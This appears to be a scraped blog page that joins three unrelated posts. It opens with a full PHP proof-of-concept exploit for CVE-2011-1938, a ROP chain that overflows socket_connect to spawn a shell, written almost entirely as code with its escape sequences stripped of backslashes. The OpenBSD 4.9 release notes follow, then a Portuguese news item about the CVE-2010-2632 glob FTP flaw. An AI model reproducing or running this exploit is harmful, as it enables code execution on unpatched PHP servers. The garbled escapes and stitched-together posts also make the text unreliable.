PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938


** Jonathan Salwan - @shell_storm
** 2011-06-04
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)n";
echo "[+] CVE-2011-1938nn";

# Gadgets in /usr/bin/php
define('DUMMY', "x42x42x42x42"); // padding
define('STACK', "x20xbax74x08"); // .data 0x46a0 0x874ba20
define('STACK4', "x24xbax74x08"); // STACK + 4
define('STACK8', "x28xbax74x08"); // STACK + 8
define('STACK12', "x3cxbax74x08"); // STACK + 12
define('INT_80', "x27xb6x07x08"); // 0x0807b627: int $0x80
define('INC_EAX', "x66x50x0fx08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "x60xb4x09x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "x84x3ex12x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "xc7x48x06x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "x18x45x06x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "x20x26x07x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "x23x26x07x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "x0fx4dx21x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "xe3x3bx1fx08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);


Blog: OpenBSD 4.9 Lançado!


Lançado OpenBSD 4.9!
Para os amantes deste maravilhoso S.O. podemos ressaltar alguns pontos das notas desta nova versão:

Suporte a 64 processadores,

Suporte a NTFS por padrão.

Vejam todas as notas:

  • New/extended platforms:
    • OpenBSD/amd64 and OpenBSD/i386:
      • Enabled NTFS by default (read-only) on GENERIC kernels.
      • Enabled the vmt(4) driver by default for VMWare tools support as a guest.
      • SMP kernels can now boot on machines with up to 64 cores.
      • Maximum allocation size for i386 bumped to 2G.
      • Handle >16 disks when searching for kernel boot device.
      • Added support for AES-NI instructions found in recent Intel processors.
      • Further improvements in suspend and resume.
      • Processes are now switched to TSS per cpu on the amd64 platform, resulting in removal of the old limit of ~4000 processes.
    • OpenBSD/hppa:
      • Multiprocessor support.
    • OpenBSD/loongson and OpenBSD/sgi:
      • All MIPS64 based platforms now use MI softfloat code, which implements all MIPS IV specified floating point operations.
    • OpenBSD/sparc64:
      • The vdsp(4) driver now supports the vDisk 1.1 protocol, allowing Solaris to run on top of an OpenBSD control domain.


  • Improved hardware support, including:
    • New vte(4) driver for RDC R6040 10/100 Ethernet devices.
    • New rdcphy(4) driver for RDC Semiconductor R6040 10/100 Ethernet PHY.
    • New rsu(4) driver for Realtek RTL8188SU/RTL8191SU/RTL8192SU USB IEEE 802.11b/g/n wireless devices.
    • New urtwn(4) driver for Realtek RTL8188CU/RTL8192CU USB IEEE 802.11b/g/n wireless devices.
    • New utwitch(4) driver for YUREX USB twitch/jiggle of knee sensor.
    • Support for AR9271, AR9280+AR7010 and AR9287+AR7010 USB IEEE 802.11a/g/n wireless adapters has been added to athn(4).
    • Support for 82583V has been added to em(4).
    • Support for Yukon 88E8059 has been added to msk(4).
    • Support for SiS191 has been added to se(4).
    • Support for SAS2004 has been added to mpii(4).
    • Support for NVIDIA MCP89 SATA has been added to pciide(4).
    • Support for Mobility Radeon HD 4200 has been added to radeondrm(4).
    • pms(4) support has been significantly reworked and expanded.
    • MCLGETI support has been added to xl(4).
    • Support for low latency interrupt modulation has been added to ix(4).
    • Port multiplier support has been added to ahci(4) and sili(4).
    • Support for Sun XVR-300 graphics has been added to radeonfb(4).
    • Added workaround for BCM5906 A0/1/2 controller silicon bug in bge(4).
    • ugen(4) can now be attached along with other drivers to multifunction devices.
    • umodem(4) now supports more devices.
    • umsm(4) now supports more mobile broadband devices.
    • Support for more image processing controls was added to uvideo(4).


  • Generic network stack improvements:
    • Reworking of the MCLGETI livelock algorithm to improve forwarding and host performance under high network load.
    • Added support for socket splicing; sockets can be temporarily connected so that the kernel moves data without userland intervention. This will be used by relayd(8) in the next release.
    • Added AES-GCM support for IPsec.
    • Added automatic send and receive buffer scaling for TCP.
    • Added wpakey option to ifconfig(8) replacing wpa-psk(8).
    • TCP acknowledgments are no longer delayed on the loopback interface.
    • Network livelock counters are now exported via sysctl(3).
    • A radix tree sorting bug was fixed, which results in significant improvements to IPsec performance under certain conditions.
    • tcpdump(8) now decodes Multicast DNS (mDNS) traffic.
    • Wake on Lan support has been added to arp(8).
    • Enabled MPLS and mpe(4) by default on GENERIC kernels.
    • Added a mpls option to ifconfig(8) to enable MPLS on a per interface basis replacing the global sysctl knob.


  • OpenBGPD, OpenOSPFD and other routing daemon improvements:
    • bgpd(8) handles various message encoding errors more gracefully now.
    • Notification messages are now logged in bgpd(8).
    • ospfd(8) will now correctly redistribute overlapping routes.
    • ospfctl(8) now prints the LSDB checksum in the show summary output for quick verification that two LSDBs are in sync.
    • Fixed ldpd(8)‘s message parser to work on all architectures and more LDP messages are now implemented.
    • Various improvements in ospf6d(8).


  • pf(4) improvements:
    • The logging subsystem has been largely rewritten, now logging the translated addresses again instead of the original ones.
    • match log rules cause a log on the fly, showing the packet exactly as pf(4) sees it at the moment of evaluating that rule. A packet can also be logged more than once now.
    • match log(matches) rules allow the further rule matching to be traced.
    • pflog(4) now includes the original addresses and ports for packets that have been rewritten. This is also displayed by tcpdump(8).


  • IPsec stack audit was performed, resulting in:
    • Several potential security problems have been identified and fixed.
    • ARC4 based PRNG code was audited and revamped.
    • New explicit_bzero kernel function was introduced to prevent a compiler from optimizing bzero calls away.


  • SCSI improvements:
    • Improved safety when detaching SCSI devices by waiting for the completion of pending commands.
    • Improved hotplug support on mpi(4) and mpii(4).
    • Continued iopoolification of SCSI drivers, notably on umass(4) which improves the reliability and performance of multi-LUN devices.
    • Added vscsi(4), a driver for userland handling of SCSI device commands.
    • Added iscsid(8), an iSCSI initiator.
    • Forcibly restrict devices incapable of tagged I/O to executing one command at a time.
    • Discover and honour read-only status of sd(4) devices.
    • Improve st(4) handling of I/O residual information.
    • sd(4) devices that can only execute one command at a time (e.g. USB) will now be allowed to spin up if necessary.
    • cd(4) will now attach CDROM devices identified as non-removable.


  • Assorted improvements:
    • Enabled wide character support in ncurses(3).
    • Added nsd(8), an authoritative name server implementation.
    • Disklabel UID support improved and added to more utilities.
    • rarpd(8) now accepts a list of interfaces to listen on.
    • dhclient(8) now accepts ‘egress’ as an interface name, meaning whichever interface is marked as being in the ‘egress’ group.
    • dhcpd(8) no longer listens on interfaces without a broadcast address (e.g. pflog(4)).
    • who(1) now displays as much of the hostname as fits on the line.
    • tcpdump(8) now correctly handles ‘net’ primitives when processing pflog(4) traffic.
    • fdisk(8) now respects failure to read the MBR.
    • fdisk(8) will no longer infinitely loop when encountering an improperly constructed EBR.
    • disklabel(8) no longer reuses information from a failed partition addition on the next addition of the same partition.
    • Many unused and obsolete disktab(5) entries removed.
    • Enabled X11 autoconfiguration on sparc and sparc64.
    • Implement attribute syntax from RFC4517 and support bsdauth in ldapd(8).
    • New video(1) utility which can record or display images from video(4).
    • httpd(8) mod_headers now handles apache2 style RequestHeader directives.
    • UNIX-domain datagram socket support has been added to nc(1) (-uU option).
    • Added support for terabyte units in disklabel(8).
    • loongson and sgi platforms have been switched over to gcc4.
    • ddb cpu support was added to the sgi platform.
    • Fast path TLB miss handling was added to the landisk platform, resulting in a 44-50% gain in performance.
    • PCIe extended configuration space can now be viewed using pcidump(8) (-xxx option).
    • The number of spurious IPIs has been decreased on the amd64 platform, resulting in improved performance.
    • Numerous improvements and bug fixes to tmux(1).
    • Considerable robustness and interoperability improvements in the IKEv2 daemon iked(8).
    • Skipjack and libdes were retired from the system. CAST-128 implementation was also removed from libc.
    • Removed some races in the USB subsystem, substantially increasing reliability.
    • Added a few more compat_linux(8) system calls to make it possible for newer versions of applications, such as Skype, to execute.
    • OpenBSD-specific package documentation is now centralised in /usr/local/share/doc/pkg-readmes.


  • Install/Upgrade process changes:
    • Fixed the hppa CD installation process.
    • Added some more free firmwares to the CD media that could fit them.
    • Make the macppc upgrade script update the boot blocks (oddly, this had been broken a very long time and no one noticed).
    • Teach the install script about the configuration of 802.11 interfaces. Visible networks can be listed, and even configured for WPA.
    • The install script now passes collected entropy better to the system which is booted next.
    • Upgrade now defaults to checking only the root filesystem.
    • Upgrade no longer checks filesystems with a fs_passno of 0.
    • Upgrade now asks if it should proceed even if one or more filesystem mounts fail.
    • Installer now configures ntpd(8) to use all provided time source IPs.


  • New rc.d(8) for starting, stopping and reconfiguring package daemons:
    • The rc.subr(8) framework allows for easy creation of rc scripts. This framework is still evolving.
    • Only a handful of packages have migrated for now.
    • rc.local can still be used instead of or in addition to rc.d(8).


  • OpenSSH 5.8:
    • New features:
      • Implement Elliptic Curve Cryptography modes for key exchange (ECDH) and host/user keys (ECDSA) as specified by RFC5656. ECDH and ECDSA offer better performance than plain DH and DSA at the same equivalent symmetric key length, as well as much shorter keys.
      • sftp(1) and sftp-server(8): add a protocol extension to support a hard link operation. It is available through the “ln” command in the client. The old “ln” behaviour of creating a symlink is available using its “-s” option or through the preexisting “symlink” command.
      • scp(1): Add a new -3 option to scp: Copies between two remote hosts are transferred through the local host. Without this option the data is copied directly between the two remote hosts.
      • ssh(1): automatically order the hostkeys requested by the client based on which hostkeys are already recorded in known_hosts. This avoids hostkey warnings when connecting to servers with new ECDSA keys, since these are now preferred when learning hostkeys for the first time.
      • ssh(1) and sshd(8): add a new IPQoS option to specify arbitrary TOS/DSCP/QoS values instead of hardcoding lowdelay/throughput. (bz#1733)
      • sftp(1): the sftp client is now significantly faster at performing directory listings, using OpenBSD glob(3) extensions to preserve the results of stat(3) operations performed in the course of its execution rather than performing expensive round trips to fetch them again afterwards.
      • ssh(1): “atomically” create the listening mux socket by binding it on a temporary name and then linking it into position after listen() has succeeded. This allows the mux clients to determine that the server socket is either ready or stale without races. Stale server sockets are now automatically removed. (also fixes bz#1711)
      • ssh(1) and sshd(8): add a KexAlgorithms knob to the client and server configuration to allow selection of which key exchange methods are used by ssh(1) and sshd(8) and their order of preference.
      • sftp(1) and scp(1): factor out bandwidth limiting code from scp(1) into a generic bandwidth limiter that can be attached using the atomicio callback mechanism and use it to add a bandwidth limit option to sftp(1). (bz#1147)
    • The following significant bugs have been fixed in this release:
      • ssh(1) and ssh-agent(1): honour $TMPDIR for client xauth and ssh-agent temporary directories. (bz#1809)
      • ssh(1): avoid NULL deref on receiving a channel request on an unknown or invalid channel. (bz#1842)
      • sshd(8): remove a debug() that pollutes stderr on client connecting to a server in debug mode. (bz#1719)
      • scp(1): pass through ssh command-line flags and options when doing remote-remote transfers, e.g. to enable agent forwarding which is particularly useful in this case. (bz#1837)
      • sftp-server(8): umask should be parsed as octal.
      • sftp(1): escape ‘[‘ in filename tab-completion.
      • ssh(1): Typo in confirmation message. (bz#1827)
      • sshd(8): prevent free() of string in .rodata when overriding AuthorizedKeys in a Match block.
      • sshd(8): Use default shell /bin/sh if $SHELL is “”.
      • ssh(1): kill proxy command on fatal() (we already killed it on clean exit).
      • ssh(1): install a SIGCHLD handler to reap expired child process. (bz#1812)
      • Support building against openssl-1.0.0a
      • Fix vulnerability in legacy certificate signing introduced in OpenSSH-5.6 and found by Mateusz Kocielski.Toda a nota pode ser vista em:

BLOG: Vulnerabilidade compromete uso de FTP em servidores Unix-Like


Uma notícia muito importante foi divulgada recentemente.  A biblioteca Libc/Glob é utilizada neste exploit, o qual o site especifica detalhadamente. Segundo a publicação,  a vulnerabilidade já atingiu empresas de grande porte como até mesmo Adobe. Confira abaixo um trecho:

Author: Maksymilian Arciemowicz
– – Dis.: 06.11.2009
– – Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
– – OpenBSD 4.7
– – NetBSD 5.0.2
– – FreeBSD 7.3/8.1
– – Oracle Sun Solaris 10
– – GNU Libc (glibc)

Affected Ftp Servers:
– – (verified 02.07.2010: “connection refused” and ban)
– – (verified 02.07.2010: “connection limit of 160 reached”
and ban)
– –
– –
– –
– –
– – more more and more

Affected Vendors (not verified):
– – Apple
– – Microsoft Interix
– – HP
– – more more more

O anúncio principal encontra-se em

Iremos acompanhar esta thread de perto.
Reportaremos caso possamos descobrir algo a mais sobre esta impactante notícia.